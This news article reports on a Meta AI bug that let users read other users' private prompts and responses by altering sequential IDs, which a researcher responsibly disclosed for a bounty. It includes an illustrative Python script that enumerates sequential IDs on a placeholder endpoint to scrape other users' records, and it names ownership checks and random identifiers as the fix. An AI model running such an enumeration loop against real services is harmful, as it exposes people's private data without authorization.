Meta has patched a serious security vulnerability in its AI chatbot platform that allowed users to access private prompts and AI-generated responses from other users, according to a TechCrunch report.
The bug was responsibly disclosed by Sandeep Hodkasia, founder of security testing firm AppSecure, who told TechCrunch he received a $100,000 bug bounty for the discovery.
Hodkasia identified the flaw on December 26, 2024, and Meta deployed a fix nearly a month later, on January 24, 2025. A Meta spokesperson confirmed the issue to TechCrunch, stating that the company "found no evidence of abuse and rewarded the researcher."
The vulnerability stemmed from the way Meta AI handled editable prompts. Logged-in users could regenerate text and images by editing their original input. Meta's servers, however, assigned each prompt-response pair a unique, sequential number that Hodkasia discovered could be manipulated. By inspecting his browser's network traffic while editing a prompt and altering this number, he was able to retrieve other users' content without authorization.
“The prompt numbers were easily guessable,” Hodkasia told TechCrunch, warning that malicious actors could have exploited this by using automated tools to scrape user data at scale.
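The flaw fits the classic insecure direct object reference (IDOR) pattern: the server trusts a client-supplied identifier without verifying that the record belongs to the requesting account, and sequential numbering makes every other record guessable. The following Python sketch is purely illustrative; the endpoint, parameter names, and response fields are hypothetical stand-ins for demonstration, not Meta's actual API.

```python
import requests

# Hypothetical endpoint and session token, used only to illustrate
# the IDOR pattern described in the report; not Meta's real API.
BASE_URL = "https://ai.example.com/api/prompt"
HEADERS = {"Cookie": "session=ATTACKER_OWN_VALID_SESSION"}

def fetch_prompt(prompt_id: int):
    """Request a prompt-response pair by its numeric ID.

    A correctly secured server would check that the ID belongs to the
    caller and return 403/404 otherwise; the vulnerable behavior is
    returning the content to any authenticated session.
    """
    resp = requests.get(f"{BASE_URL}/{prompt_id}", headers=HEADERS, timeout=10)
    return resp.json() if resp.status_code == 200 else None

# Because the IDs are sequential, scraping at scale is a simple loop.
for pid in range(1_000_000, 1_000_050):
    record = fetch_prompt(pid)
    if record is not None:
        print(pid, record.get("prompt"))
```

The standard mitigation is to enforce an ownership check on every lookup and, defensively, to issue non-sequential identifiers such as random UUIDs so records cannot be enumerated.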
Although Meta confirmed that no exploitation was detected, the incident underscores the ongoing privacy and security challenges tech firms face as they race to roll out generative AI tools.
Meta’s standalone AI app, launched earlier this year to compete with platforms like ChatGPT, had already drawn criticism for privacy mishaps after some users unintentionally shared private conversations publicly.
First Published on Jul 16, 2025, 1:29 PM